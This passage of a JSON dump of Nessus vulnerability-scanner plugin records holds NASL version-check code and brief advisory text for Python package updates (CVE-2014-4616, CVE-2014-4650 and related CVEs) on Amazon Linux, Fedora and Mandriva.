(isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"python-simplejson-3.5.3-1.7.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"python-simplejson-debuginfo-3.5.3-1.7.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-simplejson / python-simplejson-debuginfo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:07:11", "description": "Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-01T00:00:00", "type": "nessus", "title": "Fedora 20 : python-2.7.5-13.fc20 (2014-7800)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-7800.NASL", "href": "https://www.tenable.com/plugins/nessus/76328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7800.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76328);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-7800\");\n\n script_name(english:\"Fedora 20 : python-2.7.5-13.fc20 (2014-7800)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8c74e51\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python-2.7.5-13.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:12:27", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-14T00:00:00", "type": "nessus", "title": "Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-14257.NASL", "href": "https://www.tenable.com/plugins/nessus/79238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14257.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79238);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n\n script_name(english:\"Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3b06ef1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python3-3.3.2-10.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:11:38", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-11T00:00:00", "type": "nessus", "title": "Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-14208.NASL", "href": "https://www.tenable.com/plugins/nessus/79095", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14208.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79095);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14208\");\n\n script_name(english:\"Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143191.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb72edb4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"python3-3.4.1-16.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:11:43", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-10T00:00:00", "type": "nessus", "title": "Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-14245.NASL", "href": "https://www.tenable.com/plugins/nessus/79076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14245.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79076);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n\n script_name(english:\"Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d288d8e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python3-3.3.2-18.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:46:47", "description": "Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary edited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race condition where a file created could be created with world read/write permissions instead of the permissions dictated by the original umask of the process. This could allow a local attacker that could win the race to view and edit files created by a program using this call. Note that prior versions of Python, including 2.x, do not include the vulnerable _get_masked_mode() function that is used by os.makedirs() when exist_ok is set to True (CVE-2014-2667).\n\nPython are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root (CVE-2014-4650).", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7338", "CVE-2014-1912", "CVE-2014-2667", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64python3-devel", "p-cpe:/a:mandriva:linux:lib64python3.3", "p-cpe:/a:mandriva:linux:python3", "p-cpe:/a:mandriva:linux:python3-docs", "p-cpe:/a:mandriva:linux:tkinter3", "p-cpe:/a:mandriva:linux:tkinter3-apps", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-076.NASL", "href": "https://www.tenable.com/plugins/nessus/82329", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:076. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82329);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-4650\");\n script_xref(name:\"MDVSA\", value:\"2015:076\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary\nedited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race\ncondition where a file created could be created with world read/write\npermissions instead of the permissions dictated by the original umask\nof the process. This could allow a local attacker that could win the\nrace to view and edit files created by a program using this call. Note\nthat prior versions of Python, including 2.x, do not include the\nvulnerable _get_masked_mode() function that is used by os.makedirs()\nwhen exist_ok is set to True (CVE-2014-2667).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3-devel-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python3.3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", 